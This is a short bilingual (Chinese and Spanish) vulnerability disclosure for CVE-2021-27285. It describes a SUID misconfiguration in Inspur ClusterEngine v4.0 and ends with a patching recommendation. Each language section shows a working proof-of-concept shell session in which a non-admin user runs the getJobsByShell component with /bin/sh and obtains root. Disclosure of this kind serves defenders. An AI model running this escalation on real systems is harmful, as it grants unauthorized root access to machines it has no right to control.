
Prueba de concepto de exploit para la configuración incorrecta de SUID en Inspur ClusterEngine (CVE-2021-27285) que permite a usuarios no administradores escalar privilegios a root a través del componente getJobsByShell.
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。
浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。
提权过程如下:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
修复建议: 升级相关组件
La plataforma de gestión de trabajos Inspur ClusterEngine es un software de gestión de trabajos diseñado específicamente para los productos HPC de la serie Inspur TianSuo. Una configuración incorrecta en los ajustes de SUID de Inspur ClusterEngine permite a los usuarios no administradores escalar privilegios y obtener acceso root a través de ciertos componentes.
Inspur ClusterEngine v4.0 tiene un problema de configuración incorrecta de SUID con el componente "/opt/tsce4/torque6/bin/getJobsByShell", lo que permite a los usuarios no administradores escalar privilegios y obtener acceso root a través del mecanismo SUID.
El proceso de escalada de privilegios es el siguiente:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
Recomendación: parchear los componentes relevantes.